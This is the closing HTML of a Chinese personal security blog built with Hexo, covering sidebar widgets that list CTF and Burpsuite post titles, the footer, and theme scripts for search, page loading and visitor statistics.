                                    "<p>"+"来源《"+data.from+"》</p><p>提供者-"+data.creator+"</p>");
                                }});}
                                $(function (){getYiyan();$('#hitokoto').click(function(){getYiyan();})});</script></div></div></div><div class="card widget" data-type="links"><div class="card-content"><div class="menu"><h3 class="menu-label">链接</h3><ul class="menu-list"><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/tX4XuAytAbP7kFrakykAbx" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">CTF做题笔记</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li><li><a class="level is-mobile" href="https://www.wolai.com/lnk3377/sXchgZ2ArybVqFfkTrEsZN" target="_blank" rel="noopener"><span class="level-left"><span class="level-item">打靶机记录</span></span><span class="level-right"><span class="level-item tag">www.wolai.com</span></span></a></li></ul></div></div></div><!--!--><div class="card widget"><div class="card-content"><h3 class="menu-label">最新文章</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-04-19T07:12:53.945Z">2022-04-19</time></p><p class="title"><a href="/2022/04/19/*CTF2022/">🌟CTF2022-Web部分WriteUp</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-24T06:52:40.931Z">2022-03-24</time></p><p class="title"><a href="/2022/03/24/wyy/">爬取网易云评论数据</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-14T12:30:38.336Z">2022-03-14</time></p><p class="title"><a href="/2022/03/14/burp_unser/">Burpsuite---反序列化专题</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-12T06:02:14.568Z">2022-03-12</time></p><p class="title"><a href="/2022/03/12/burp_file_upload/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2022-03-12T01:24:23.384Z">2022-03-12</time></p><p class="title"><a href="/2022/03/12/burp_ssrf/">Burpsuite---SSRF专题</a></p></div></article></div></div><!--!--><div class="card widget"><div class="card-content"><div class="menu"><h3 class="menu-label">归档</h3><ul class="menu-list"><li><a class="level is-mobile is-marginless" href="/archives/2022/04/"><span class="level-start"><span class="level-item">四月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/03/"><span class="level-start"><span class="level-item">三月 2022</span></span><span class="level-end"><span class="level-item tag">9</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/02/"><span class="level-start"><span class="level-item">二月 2022</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2022/01/"><span class="level-start"><span class="level-item">一月 2022</span></span><span class="level-end"><span class="level-item tag">1</span></span></a></li><li><a class="level is-mobile is-marginless" href="/archives/2021/12/"><span class="level-start"><span class="level-item">十二月 2021</span></span><span class="level-end"><span class="level-item tag">4</span></span></a></li><a class="level is-mobile is-marginless" href="/archives/"><span class="level-start"><span class="level-item">查看全部&gt;&gt;</span></span></a></ul></div></div></div><!--!--><div class="card widget" data-type="subscribe-email"><div class="card-content"><div class="menu"><h3 class="menu-label">订阅更新</h3><form action="https://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open(&#039;https://feedburner.google.com/fb/a/mailverify?uri=&#039;,&#039;popupwindow&#039;,&#039;scrollbars=yes,width=550,height=520&#039;);return true"><input type="hidden" value="" name="uri"><input type="hidden" name="loc" value="en_US"><div class="field has-addons"><div class="control has-icons-left is-expanded"><input class="input" name="email" type="email" placeholder="Email"><span class="icon is-small is-left"><i class="fas fa-envelope"></i></span></div><div class="control"><input class="button" type="submit" value="订阅"></div></div></form></div></div></div><!--!--><div class="column-right-shadow is-hidden-widescreen"></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/">秋秋晚</a><p class="size-small"><span>&copy; 2022 秋秋晚</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a> &amp; <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">Amazing</a> <br><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️本站自 <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> 已运行 <strong>" + dnum + "</strong> 天 <strong>" + hnum + "</strong> 小时 <strong>" + mnum + "</strong> 分 <strong>" + snum + "</strong> 秒！❤️";
        }var now = new Date();setInterval("createTime('2021/12/31 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️感谢 <strong><span id="busuanzi_value_site_uv">99+</span></strong> 小伙伴的 <strong><span id="busuanzi_value_site_pv">99+</span></strong> 次光临！❤️</span></div></p></div><div class="level-end"><div class="field has-addons"><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Creative Commons" href="https://creativecommons.org/"><i class="fab fa-creative-commons"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Attribution 4.0 International" href="https://creativecommons.org/licenses/by/4.0/"><i class="fab fa-creative-commons-by"></i></a></p><p class="control"><a class="button is-transparent is-large" target="_blank" rel="noopener" title="Download on GitHub" href="https://github.com/removeif/hexo-theme-amazing"><i class="fab fa-github"></i></a></p></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" async></script><script>moment.locale("zh-CN");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="回到顶端" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.8/js/lightgallery.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><script>$.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);})</script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="想要查找什么..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"想要查找什么...","untitled":"(无标题)","posts":"文章","pages":"页面","categories":"分类","tags":"标签"});
        });</script><script src="https://cdn.jsdelivr.net/npm/pjax@0.2.8/pjax.js"></script><script type="text/javascript">var pjax = new Pjax({
            elements: "a",//代表点击链接就更新
            selectors: [  //代表要更新的节点
                ".section",
                "title"
            ],
            cache: true,
            cacheBust:false
        })

        function loadBusuanzi(){
        $.getScript("//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js", function () {});
        }

        function loadMathJax() { //加载mathjax
            $.getScript("//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML", function () {
                MathJax.Hub.Config({ tex2jax: { inlineMath: [['$', '$'], ['\(', '\)']] } });
                var math = document.getElementsByClassName("entry-content")[0];
                MathJax.Hub.Queue(["Typeset", MathJax.Hub, math]);
            });
        };

        // 开始 PJAX 执行的函数
        document.addEventListener('pjax:send', function () {
        });
        
        // PJAX 完成之后执行的函数，可以和上面的重载放在一起
        document.addEventListener('pjax:complete', function () {
            $(".section").css({opacity:1});
            if(false){
                $.getScript('/js/comment-issue-data.js',function(){loadIssueData('9901fc9cd07fca97d9c5','676e4024a92c4843a002172e7c57dd2a9875f238','LHXHL','blog_comment',false);});
            }
            if(false){
                loadMathJax();
            }
            loadMainJs(jQuery, window.moment, window.ClipboardJS, window.IcarusThemeSettings);
            loadBackTop();
            loadBusuanzi();
            if(typeof loadBanner == 'function'){
                loadBanner();
            }
        });</script></body></html>